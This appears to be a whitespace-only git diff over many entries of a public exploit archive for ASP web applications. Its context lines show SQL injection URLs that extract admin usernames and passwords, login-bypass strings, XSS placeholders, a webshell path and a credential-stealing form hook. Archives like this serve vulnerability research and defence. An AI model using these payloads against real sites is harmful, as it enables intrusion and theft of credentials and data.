+http://www.example.com/test_DUportal/includes/inc_poll_voting.asp?DAT_PARENT='SQL_INJECTION&DAT_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&DAT_ID=112 \ No newline at end of file diff --git a/platforms/asp/webapps/25511.txt b/platforms/asp/webapps/25511.txt index 81e5ae5de..d82fd299b 100755 --- a/platforms/asp/webapps/25511.txt +++ b/platforms/asp/webapps/25511.txt @@ -4,5 +4,4 @@ CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failu Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/store/searchResults.asp?name=&idCategory=[SQL]&sku=&priceFrom=0&priceTo=9999999999&validate=1 - +http://www.example.com/store/searchResults.asp?name=&idCategory=[SQL]&sku=&priceFrom=0&priceTo=9999999999&validate=1 \ No newline at end of file diff --git a/platforms/asp/webapps/25845.txt b/platforms/asp/webapps/25845.txt index 65b3e4bba..f3a01691b 100755 --- a/platforms/asp/webapps/25845.txt +++ b/platforms/asp/webapps/25845.txt @@ -5,4 +5,4 @@ Ublog Reload is prone to a cross-site scripting vulnerability. This issue is due An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/UblogReload/trackback.asp?bi=[id]&btitle=[XSS]&mode=view -http://www.example.com/UblogReload/trackback.asp?bi=343&btitle=&mode=view +http://www.example.com/UblogReload/trackback.asp?bi=343&btitle=&mode=view \ No newline at end of file diff --git a/platforms/asp/webapps/2592.htm b/platforms/asp/webapps/2592.htm index 643e72bc4..7004c36c6 100755 --- a/platforms/asp/webapps/2592.htm +++ b/platforms/asp/webapps/2592.htm @@ -35,4 +35,4 @@ Next to admin.asp #Im Not Hacker! --> -# milw0rm.com [2006-10-18] +# milw0rm.com [2006-10-18] \ No newline at end of file diff --git a/platforms/asp/webapps/26107.txt b/platforms/asp/webapps/26107.txt index d9acf5cd9..76bc29b8b 100755 --- a/platforms/asp/webapps/26107.txt +++ b/platforms/asp/webapps/26107.txt @@ -4,5 +4,4 @@ DVBBS is prone to multiple cross-site scripting vulnerabilities because the appl An attacker may leverage these issues to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE] - +http://www.example.com/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE] \ No newline at end of file diff --git a/platforms/asp/webapps/26109.txt b/platforms/asp/webapps/26109.txt index 09fa1ea51..f5a4087e4 100755 --- a/platforms/asp/webapps/26109.txt +++ b/platforms/asp/webapps/26109.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary code in the browser o http://www.example.com/boardhelp.asp?boardid=0&act=2&title=[XSS-CODE] http://www.example.com/boardhelp.asp?boardid=0&view=faq[XSS-CODE]&act=3 http://www.example.com/boardhelp.asp?boardid=0&view=faq&act=3[XSS-CODE] -http://www.example.com/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title= +http://www.example.com/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title= \ No newline at end of file diff --git a/platforms/asp/webapps/2642.asp b/platforms/asp/webapps/2642.asp index 6e2f65536..6dcf6aa49 100755 --- a/platforms/asp/webapps/2642.asp +++ b/platforms/asp/webapps/2642.asp @@ -186,4 +186,4 @@ End If Set objtake = Nothing %> -# milw0rm.com [2006-10-24] +# milw0rm.com [2006-10-24] \ No newline at end of file diff --git a/platforms/asp/webapps/26445.pl b/platforms/asp/webapps/26445.pl index fa50f2911..e59806c6f 100755 --- a/platforms/asp/webapps/26445.pl +++ b/platforms/asp/webapps/26445.pl @@ -282,4 +282,4 @@ die("[-] Can't creat socket\n"); while(){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("[-] Can't connect to $http\n"); } -} +} \ No newline at end of file diff --git a/platforms/asp/webapps/2661.asp b/platforms/asp/webapps/2661.asp index d39afde8d..bc54cec23 100755 --- a/platforms/asp/webapps/2661.asp +++ b/platforms/asp/webapps/2661.asp @@ -176,4 +176,4 @@ End If Set objtake = Nothing %> -# milw0rm.com [2006-10-27] +# milw0rm.com [2006-10-27] \ No newline at end of file diff --git a/platforms/asp/webapps/2662.txt b/platforms/asp/webapps/2662.txt index efaebcf56..c118e9402 100755 --- a/platforms/asp/webapps/2662.txt +++ b/platforms/asp/webapps/2662.txt @@ -43,4 +43,4 @@ IRSDL [4t} kapda -# milw0rm.com [2006-11-12] +# milw0rm.com [2006-11-12] \ No newline at end of file diff --git a/platforms/asp/webapps/2763.txt b/platforms/asp/webapps/2763.txt index 7547169e4..d375042b6 100755 --- a/platforms/asp/webapps/2763.txt +++ b/platforms/asp/webapps/2763.txt @@ -16,4 +16,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-11-12] +# milw0rm.com [2006-11-12] \ No newline at end of file diff --git a/platforms/asp/webapps/2764.txt b/platforms/asp/webapps/2764.txt index 81bc43aea..8f983df57 100755 --- a/platforms/asp/webapps/2764.txt +++ b/platforms/asp/webapps/2764.txt @@ -19,4 +19,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-11-12] +# milw0rm.com [2006-11-12] \ No newline at end of file diff --git a/platforms/asp/webapps/2765.txt b/platforms/asp/webapps/2765.txt index eb89c3827..94c149647 100755 --- a/platforms/asp/webapps/2765.txt +++ b/platforms/asp/webapps/2765.txt @@ -22,4 +22,4 @@ OR --- # Im not Hacker! -# milw0rm.com [2006-11-12] +# milw0rm.com [2006-11-12] \ No newline at end of file diff --git a/platforms/asp/webapps/2772.htm b/platforms/asp/webapps/2772.htm index 348323297..ffdb2aee9 100755 --- a/platforms/asp/webapps/2772.htm +++ b/platforms/asp/webapps/2772.htm @@ -33,4 +33,4 @@ Next Click "Profile" #Im Not Hacker! --> -# milw0rm.com [2006-11-13] +# milw0rm.com [2006-11-13] \ No newline at end of file diff --git a/platforms/asp/webapps/2773.txt b/platforms/asp/webapps/2773.txt index a88c7b048..f608f0164 100755 --- a/platforms/asp/webapps/2773.txt +++ b/platforms/asp/webapps/2773.txt @@ -16,4 +16,4 @@ UserName: ' union select 0,0 from admin # Im not Hacker! -# milw0rm.com [2006-11-13] +# milw0rm.com [2006-11-13] \ No newline at end of file diff --git a/platforms/asp/webapps/2774.txt b/platforms/asp/webapps/2774.txt index 2cb72a9e1..c3f60a1a0 100755 --- a/platforms/asp/webapps/2774.txt +++ b/platforms/asp/webapps/2774.txt @@ -16,4 +16,4 @@ UserName: ' union select 0,0 from admin # Im not Hacker! -# milw0rm.com [2006-11-13] +# milw0rm.com [2006-11-13] \ No newline at end of file diff --git a/platforms/asp/webapps/2779.txt b/platforms/asp/webapps/2779.txt index 5dc8843ee..e65f2d748 100755 --- a/platforms/asp/webapps/2779.txt +++ b/platforms/asp/webapps/2779.txt @@ -16,4 +16,4 @@ UserName: ' union select 0,0,0,0,0,0,0,0 from categories # Im not Hacker! -# milw0rm.com [2006-11-14] +# milw0rm.com [2006-11-14] \ No newline at end of file diff --git a/platforms/asp/webapps/2780.txt b/platforms/asp/webapps/2780.txt index b5e5fb148..d6ac31c44 100755 --- a/platforms/asp/webapps/2780.txt +++ b/platforms/asp/webapps/2780.txt @@ -17,4 +17,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-11-14] +# milw0rm.com [2006-11-14] \ No newline at end of file diff --git a/platforms/asp/webapps/2781.txt b/platforms/asp/webapps/2781.txt index 7e3382495..75394852c 100755 --- a/platforms/asp/webapps/2781.txt +++ b/platforms/asp/webapps/2781.txt @@ -21,4 +21,4 @@ laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@gmail.com -# milw0rm.com [2006-11-14] +# milw0rm.com [2006-11-14] \ No newline at end of file diff --git a/platforms/asp/webapps/2782.txt b/platforms/asp/webapps/2782.txt index 36f1a6db7..418534d22 100755 --- a/platforms/asp/webapps/2782.txt +++ b/platforms/asp/webapps/2782.txt @@ -19,4 +19,4 @@ laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@gmail.com -# milw0rm.com [2006-11-14] +# milw0rm.com [2006-11-14] \ No newline at end of file diff --git a/platforms/asp/webapps/27898.txt b/platforms/asp/webapps/27898.txt index 88311cb1d..ed045e650 100755 --- a/platforms/asp/webapps/27898.txt +++ b/platforms/asp/webapps/27898.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce CodeAvalanche News 1.2 is reported to be vulnerable. Other versions may be affected as well. -http://www.exmaple.com/[path_of_application]/CANews/Admin/default.asp?password=1' OR '1' = '1&Submit=Login +http://www.exmaple.com/[path_of_application]/CANews/Admin/default.asp?password=1' OR '1' = '1&Submit=Login \ No newline at end of file diff --git a/platforms/asp/webapps/27960.txt b/platforms/asp/webapps/27960.txt index cfbe15a61..ee3204eaf 100755 --- a/platforms/asp/webapps/27960.txt +++ b/platforms/asp/webapps/27960.txt @@ -4,4 +4,4 @@ LocazoList Classifieds is prone to an SQL-injection vulnerability. This issue is A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,0,0,0,email,0,0,0,0,0,0,0,0,0,0%20from%20thing+where+msgid=X +http://www.example.com/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,0,0,0,email,0,0,0,0,0,0,0,0,0,0%20from%20thing+where+msgid=X \ No newline at end of file diff --git a/platforms/asp/webapps/2813.txt b/platforms/asp/webapps/2813.txt index e277d6ea4..7917a8754 100755 --- a/platforms/asp/webapps/2813.txt +++ b/platforms/asp/webapps/2813.txt @@ -54,4 +54,4 @@ EmailAddress | OrderNo # Im not Hacker! -# milw0rm.com [2006-11-19] +# milw0rm.com [2006-11-19] \ No newline at end of file diff --git a/platforms/asp/webapps/2828.pl b/platforms/asp/webapps/2828.pl index bf1492850..27ca368fc 100755 --- a/platforms/asp/webapps/2828.pl +++ b/platforms/asp/webapps/2828.pl @@ -55,4 +55,4 @@ exit(); print "+ Exploit failed :(\n"; print "+**********************************************************************+\n"; -# milw0rm.com [2006-11-22] +# milw0rm.com [2006-11-22] \ No newline at end of file diff --git a/platforms/asp/webapps/2829.txt b/platforms/asp/webapps/2829.txt index f4a02714c..64093598b 100755 --- a/platforms/asp/webapps/2829.txt +++ b/platforms/asp/webapps/2829.txt @@ -21,4 +21,4 @@ See you Admin Hash.. # Im not Hacker! -# milw0rm.com [2006-11-22] +# milw0rm.com [2006-11-22] \ No newline at end of file diff --git a/platforms/asp/webapps/2830.txt b/platforms/asp/webapps/2830.txt index 9ebaa49a8..285f7daf5 100755 --- a/platforms/asp/webapps/2830.txt +++ b/platforms/asp/webapps/2830.txt @@ -19,4 +19,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-11-22] +# milw0rm.com [2006-11-22] \ No newline at end of file diff --git a/platforms/asp/webapps/28393.txt b/platforms/asp/webapps/28393.txt index e2b3a85ad..de7523701 100755 --- a/platforms/asp/webapps/28393.txt +++ b/platforms/asp/webapps/28393.txt @@ -122,4 +122,4 @@ http://aspxcommerce.localhost/Modules/Logo/image/cmd_134724.aspx -- SANTHO -twitter : @s4n70 +twitter : @s4n70 \ No newline at end of file diff --git a/platforms/asp/webapps/2846.txt b/platforms/asp/webapps/2846.txt index 3d4435cb6..525a8fa2d 100755 --- a/platforms/asp/webapps/2846.txt +++ b/platforms/asp/webapps/2846.txt @@ -20,4 +20,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-11-25] +# milw0rm.com [2006-11-25] \ No newline at end of file diff --git a/platforms/asp/webapps/2848.txt b/platforms/asp/webapps/2848.txt index 4e1ac7db0..34e2ec29a 100755 --- a/platforms/asp/webapps/2848.txt +++ b/platforms/asp/webapps/2848.txt @@ -9,4 +9,4 @@ http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+ --------------------------------------------------------------------------- # Just for Fun!! -# milw0rm.com [2006-11-25] +# milw0rm.com [2006-11-25] \ No newline at end of file diff --git a/platforms/asp/webapps/2849.txt b/platforms/asp/webapps/2849.txt index d079792ab..665a9b05a 100755 --- a/platforms/asp/webapps/2849.txt +++ b/platforms/asp/webapps/2849.txt @@ -29,4 +29,4 @@ Save and go to default.asp. # Im not Hacker! -# milw0rm.com [2006-11-25] +# milw0rm.com [2006-11-25] \ No newline at end of file diff --git a/platforms/asp/webapps/2853.txt b/platforms/asp/webapps/2853.txt index c70c0c1c9..08a9fecb3 100755 --- a/platforms/asp/webapps/2853.txt +++ b/platforms/asp/webapps/2853.txt @@ -9,4 +9,4 @@ http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0 --------------------------------------------------------------------------- # Just for Fun!! -# milw0rm.com [2006-11-26] +# milw0rm.com [2006-11-26] \ No newline at end of file diff --git a/platforms/asp/webapps/2881.txt b/platforms/asp/webapps/2881.txt index 7adf2ab1c..e790f4fb5 100755 --- a/platforms/asp/webapps/2881.txt +++ b/platforms/asp/webapps/2881.txt @@ -36,4 +36,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-12-01] +# milw0rm.com [2006-12-01] \ No newline at end of file diff --git a/platforms/asp/webapps/29030.txt b/platforms/asp/webapps/29030.txt index d5365f3e8..4db92857b 100755 --- a/platforms/asp/webapps/29030.txt +++ b/platforms/asp/webapps/29030.txt @@ -6,4 +6,4 @@ An attacker could exploit these issues to steal cookie-based authentication cred http://www.example.com/asp/listings.asp?l='[sql] http://www.example.com/asp/listings.asp?s=search&typ='[sql] -http://www.example.com/asp/listings.asp?s=search&typ=4&loc='[sql] +http://www.example.com/asp/listings.asp?s=search&typ=4&loc='[sql] \ No newline at end of file diff --git a/platforms/asp/webapps/2907.txt b/platforms/asp/webapps/2907.txt index d333f582d..a1861a218 100755 --- a/platforms/asp/webapps/2907.txt +++ b/platforms/asp/webapps/2907.txt @@ -25,4 +25,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-12-09] +# milw0rm.com [2006-12-09] \ No newline at end of file diff --git a/platforms/asp/webapps/29078.txt b/platforms/asp/webapps/29078.txt index c84060fbc..d981db4cc 100755 --- a/platforms/asp/webapps/29078.txt +++ b/platforms/asp/webapps/29078.txt @@ -7,5 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a Version 1.0 is vulnerable. http://www.example.com/listings.asp?peopleID='[sql] -http://www.example.com/listings.asp?sort_order='[sql] - +http://www.example.com/listings.asp?sort_order='[sql] \ No newline at end of file diff --git a/platforms/asp/webapps/2908.txt b/platforms/asp/webapps/2908.txt index 5a4521cf2..7b89da0f2 100755 --- a/platforms/asp/webapps/2908.txt +++ b/platforms/asp/webapps/2908.txt @@ -27,4 +27,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-12-09] +# milw0rm.com [2006-12-09] \ No newline at end of file diff --git a/platforms/asp/webapps/2909.txt b/platforms/asp/webapps/2909.txt index 77676c54c..c36124afe 100755 --- a/platforms/asp/webapps/2909.txt +++ b/platforms/asp/webapps/2909.txt @@ -19,4 +19,4 @@ UserName: ' union select 0,0,0,0,0,0,0,0,0,0,0,0,0 from admin # Im not Hacker! -# milw0rm.com [2006-12-09] +# milw0rm.com [2006-12-09] \ No newline at end of file diff --git a/platforms/asp/webapps/29155.txt b/platforms/asp/webapps/29155.txt index 7bdbdb65d..a0746f7b5 100755 --- a/platforms/asp/webapps/29155.txt +++ b/platforms/asp/webapps/29155.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Version 1.2 is vulnerable; other versions may also be affected. -http://www.example.com/addlisting.asp?cat=[xss] +http://www.example.com/addlisting.asp?cat=[xss] \ No newline at end of file diff --git a/platforms/asp/webapps/2962.txt b/platforms/asp/webapps/2962.txt index d2c96d89c..182642199 100755 --- a/platforms/asp/webapps/2962.txt +++ b/platforms/asp/webapps/2962.txt @@ -18,4 +18,4 @@ http://www.victim.com/ScriptPath/down.asp?id=-1%20union%20SELECT%20*%20FROM%20uy #Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed] -# milw0rm.com [2006-12-19] +# milw0rm.com [2006-12-19] \ No newline at end of file diff --git a/platforms/asp/webapps/2963.txt b/platforms/asp/webapps/2963.txt index 1293c2752..46af67477 100755 --- a/platforms/asp/webapps/2963.txt +++ b/platforms/asp/webapps/2963.txt @@ -23,4 +23,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-12-19] +# milw0rm.com [2006-12-19] \ No newline at end of file diff --git a/platforms/asp/webapps/29726.pl b/platforms/asp/webapps/29726.pl index 0bc0a0963..eaa189d28 100755 --- a/platforms/asp/webapps/29726.pl +++ b/platforms/asp/webapps/29726.pl @@ -140,4 +140,4 @@ print "+**********************************************************************+\n"; exit(); } - } + } \ No newline at end of file diff --git a/platforms/asp/webapps/2986.txt b/platforms/asp/webapps/2986.txt index 84bc597cc..7f6b54576 100755 --- a/platforms/asp/webapps/2986.txt +++ b/platforms/asp/webapps/2986.txt @@ -23,4 +23,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/asp/webapps/2987.txt b/platforms/asp/webapps/2987.txt index 1ef67493e..a99c68260 100755 --- a/platforms/asp/webapps/2987.txt +++ b/platforms/asp/webapps/2987.txt @@ -34,4 +34,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/asp/webapps/2988.pl b/platforms/asp/webapps/2988.pl index d1fe46cb4..f7250ea63 100755 --- a/platforms/asp/webapps/2988.pl +++ b/platforms/asp/webapps/2988.pl @@ -64,4 +64,4 @@ exit(); } } -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/asp/webapps/2989.txt b/platforms/asp/webapps/2989.txt index 5e14c3150..e53891c19 100755 --- a/platforms/asp/webapps/2989.txt +++ b/platforms/asp/webapps/2989.txt @@ -27,4 +27,4 @@ Home >> user # Im not Hacker! -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/asp/webapps/2990.pl b/platforms/asp/webapps/2990.pl index 509990238..1436eda3c 100755 --- a/platforms/asp/webapps/2990.pl +++ b/platforms/asp/webapps/2990.pl @@ -64,4 +64,4 @@ exit(); } } -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/asp/webapps/2991.pl b/platforms/asp/webapps/2991.pl index e3ae0e9d8..42b20d841 100755 --- a/platforms/asp/webapps/2991.pl +++ b/platforms/asp/webapps/2991.pl @@ -64,4 +64,4 @@ exit(); } } -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/asp/webapps/2992.txt b/platforms/asp/webapps/2992.txt index 082333ee5..fdf7ae26d 100755 --- a/platforms/asp/webapps/2992.txt +++ b/platforms/asp/webapps/2992.txt @@ -22,4 +22,4 @@ Example: # ajann,Turkey # ... -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/asp/webapps/2993.txt b/platforms/asp/webapps/2993.txt index 531888616..c37e24b79 100755 --- a/platforms/asp/webapps/2993.txt +++ b/platforms/asp/webapps/2993.txt @@ -22,4 +22,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/asp/webapps/2994.htm b/platforms/asp/webapps/2994.htm index 87d814972..c1b4b546b 100755 --- a/platforms/asp/webapps/2994.htm +++ b/platforms/asp/webapps/2994.htm @@ -81,4 +81,4 @@ Change Profile=>Username -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/asp/webapps/2995.htm b/platforms/asp/webapps/2995.htm index 6cb65d05c..6859039b1 100755 --- a/platforms/asp/webapps/2995.htm +++ b/platforms/asp/webapps/2995.htm @@ -78,4 +78,4 @@ Change Profile UserName=> -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/asp/webapps/2996.htm b/platforms/asp/webapps/2996.htm index f4510b5ba..6e364ca1f 100755 --- a/platforms/asp/webapps/2996.htm +++ b/platforms/asp/webapps/2996.htm @@ -78,4 +78,4 @@ User Id: -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/asp/webapps/2997.pl b/platforms/asp/webapps/2997.pl index 3504c4044..2c0ba0885 100755 --- a/platforms/asp/webapps/2997.pl +++ b/platforms/asp/webapps/2997.pl @@ -96,4 +96,4 @@ exit(); } } -# milw0rm.com [2006-12-24] +# milw0rm.com [2006-12-24] \ No newline at end of file diff --git a/platforms/asp/webapps/2998.pl b/platforms/asp/webapps/2998.pl index 8847715ce..02764fba4 100755 --- a/platforms/asp/webapps/2998.pl +++ b/platforms/asp/webapps/2998.pl @@ -96,4 +96,4 @@ exit(); } } -# milw0rm.com [2006-12-24] +# milw0rm.com [2006-12-24] \ No newline at end of file diff --git a/platforms/asp/webapps/3001.txt b/platforms/asp/webapps/3001.txt index 3d97efd05..7c29ae083 100755 --- a/platforms/asp/webapps/3001.txt +++ b/platforms/asp/webapps/3001.txt @@ -23,4 +23,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-12-24] +# milw0rm.com [2006-12-24] \ No newline at end of file diff --git a/platforms/asp/webapps/3015.pl b/platforms/asp/webapps/3015.pl index a78ff4648..fe5ea210e 100755 --- a/platforms/asp/webapps/3015.pl +++ b/platforms/asp/webapps/3015.pl @@ -96,4 +96,4 @@ exit(); } } -# milw0rm.com [2006-12-26] +# milw0rm.com [2006-12-26] \ No newline at end of file diff --git a/platforms/asp/webapps/3031.txt b/platforms/asp/webapps/3031.txt index b5610036a..320877c47 100755 --- a/platforms/asp/webapps/3031.txt +++ b/platforms/asp/webapps/3031.txt @@ -22,4 +22,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-12-28] +# milw0rm.com [2006-12-28] \ No newline at end of file diff --git a/platforms/asp/webapps/30313.txt b/platforms/asp/webapps/30313.txt index e3c52b362..4d2a9467d 100755 --- a/platforms/asp/webapps/30313.txt +++ b/platforms/asp/webapps/30313.txt @@ -29,4 +29,4 @@ src=http://urlmaliciousJavaScript> +STRING:')"> \ No newline at end of file diff --git a/platforms/asp/webapps/31666.txt b/platforms/asp/webapps/31666.txt index 4465be02d..614c7e35e 100755 --- a/platforms/asp/webapps/31666.txt +++ b/platforms/asp/webapps/31666.txt @@ -7,5 +7,4 @@ A successful exploit may allow an attacker to compromise the application, access CoBaLT 2.0 is affected; other versions may also be vulnerable. http://www.example.com/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin -http://www.example.com/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin+where+id=4 - +http://www.example.com/cobalt/cobalt_v2_yonetim/adminler.asp?git=duzenle&id=2+union+select+0,(sifre),(uye),3,null,5,6,7,8+from+admin+where+id=4 \ No newline at end of file diff --git a/platforms/asp/webapps/31811.txt b/platforms/asp/webapps/31811.txt index 72f6b0a5e..dc0ffac5e 100755 --- a/platforms/asp/webapps/31811.txt +++ b/platforms/asp/webapps/31811.txt @@ -10,5 +10,4 @@ http://www.example.com/lab/site/yonetim_kullanici_duzenle.asp?ID=1+union+select+ http://www.example.com/lab/site/yonetim_kullanici_duzenle.asp?ID=1+union+select+0,1,KULLANICIADI,3+from+KULLANICI http://www.example.com/lab/site/yonetim_kategori_duzenle.asp?ID=1+union+select+0,PAROLA,KULLANICIADI+from+KULLANICI http://www.example.com/lab/site/yonetim_kategori_duzenle.asp?islem=duzenle&ID=1+union+select+0,PAROLA,KULLANICIADI+from+KULLANICI -http://www.example.com/lab/site/yonetim_site_onayla.asp?ID=1+union+select+0,1,KULLANICIADI,3,4,PAROLA,6,7,8,9,1,1+from+KULLANICI - +http://www.example.com/lab/site/yonetim_site_onayla.asp?ID=1+union+select+0,1,KULLANICIADI,3,4,PAROLA,6,7,8,9,1,1+from+KULLANICI \ No newline at end of file diff --git a/platforms/asp/webapps/3186.txt b/platforms/asp/webapps/3186.txt index 8d4c8b9d2..355b3800f 100755 --- a/platforms/asp/webapps/3186.txt +++ b/platforms/asp/webapps/3186.txt @@ -23,4 +23,4 @@ Example: # Im not Hacker! -# milw0rm.com [2007-01-24] +# milw0rm.com [2007-01-24] \ No newline at end of file diff --git a/platforms/asp/webapps/31861.txt b/platforms/asp/webapps/31861.txt index 17434afee..b6133aa05 100755 --- a/platforms/asp/webapps/31861.txt +++ b/platforms/asp/webapps/31861.txt @@ -7,6 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a These issues affect dvbbs 8.2; other versions may also be affected. http:///www.example.com/?password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253 -D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25 - - +D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25 \ No newline at end of file diff --git a/platforms/asp/webapps/3187.txt b/platforms/asp/webapps/3187.txt index 6a25780bb..3fa778a10 100755 --- a/platforms/asp/webapps/3187.txt +++ b/platforms/asp/webapps/3187.txt @@ -22,4 +22,4 @@ Example: # Im not Hacker! -# milw0rm.com [2007-01-24] +# milw0rm.com [2007-01-24] \ No newline at end of file diff --git a/platforms/asp/webapps/3194.txt b/platforms/asp/webapps/3194.txt index 8d3de9026..934e72c24 100755 --- a/platforms/asp/webapps/3194.txt +++ b/platforms/asp/webapps/3194.txt @@ -23,4 +23,4 @@ Example: # Im not Hacker! -# milw0rm.com [2007-01-25] +# milw0rm.com [2007-01-25] \ No newline at end of file diff --git a/platforms/asp/webapps/3195.txt b/platforms/asp/webapps/3195.txt index 3d31b7f3f..a978dcc61 100755 --- a/platforms/asp/webapps/3195.txt +++ b/platforms/asp/webapps/3195.txt @@ -24,4 +24,4 @@ Example: # Im not Hacker! -# milw0rm.com [2007-01-25] +# milw0rm.com [2007-01-25] \ No newline at end of file diff --git a/platforms/asp/webapps/31967.txt b/platforms/asp/webapps/31967.txt index 2175761d1..539245e4a 100755 --- a/platforms/asp/webapps/31967.txt +++ b/platforms/asp/webapps/31967.txt @@ -14,5 +14,4 @@ document.forms[0].LoginPass.value;} function HandleSubmit(){ document.forms[0].onsubmit= SendCredentials; } window.onload = HandleSubmit;/&& print "pass !!: $baba"; -print "dont pass" if(!$baba); +print "dont pass" if(!$baba); \ No newline at end of file diff --git a/platforms/asp/webapps/32157.txt b/platforms/asp/webapps/32157.txt index 91e849787..7b10c1b68 100755 --- a/platforms/asp/webapps/32157.txt +++ b/platforms/asp/webapps/32157.txt @@ -17,4 +17,4 @@ assuming that the Kentico CMS was installed to the root folder in the server. I have already notified the authors and security team for Kentico CMS, in -their response they claimed they would issue a patch on 02-21-2014. +their response they claimed they would issue a patch on 02-21-2014. \ No newline at end of file diff --git a/platforms/asp/webapps/32212.txt b/platforms/asp/webapps/32212.txt index 4938763a4..4baaae42b 100755 --- a/platforms/asp/webapps/32212.txt +++ b/platforms/asp/webapps/32212.txt @@ -29,4 +29,4 @@ Copyright: Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: -The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. +The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. \ No newline at end of file diff --git a/platforms/asp/webapps/3233.txt b/platforms/asp/webapps/3233.txt index c5790e620..d4163ca1d 100755 --- a/platforms/asp/webapps/3233.txt +++ b/platforms/asp/webapps/3233.txt @@ -20,4 +20,4 @@ http://[SITE]/windows.asp?kategori_id=-1%20union+all+select+0,1,2,3,4,5,6,7,8,9, #Greetz: iLLeGaL-ATTaCK//TiM & HacKLivETeaM ################################################################ -# milw0rm.com [2007-01-31] +# milw0rm.com [2007-01-31] \ No newline at end of file diff --git a/platforms/asp/webapps/3241.txt b/platforms/asp/webapps/3241.txt index ac3d9e38e..11915832d 100755 --- a/platforms/asp/webapps/3241.txt +++ b/platforms/asp/webapps/3241.txt @@ -14,4 +14,4 @@ http://[SITE]/oku.asp?id=-1%20union+all+select+0,kullaniciadi,sifre,3+from+admin #Greetz: iLLeGaL-ATTaCK//TiM & HacKLivETeaM ################################################################ -# milw0rm.com [2007-01-31] +# milw0rm.com [2007-01-31] \ No newline at end of file diff --git a/platforms/asp/webapps/32653.txt b/platforms/asp/webapps/32653.txt index 58ff575ff..3aa098ceb 100755 --- a/platforms/asp/webapps/32653.txt +++ b/platforms/asp/webapps/32653.txt @@ -9,5 +9,4 @@ Professional Download Assistant 0.1 is vulnerable; other versions may be affecte The following example is available: user: ZoRLu -password: ' or 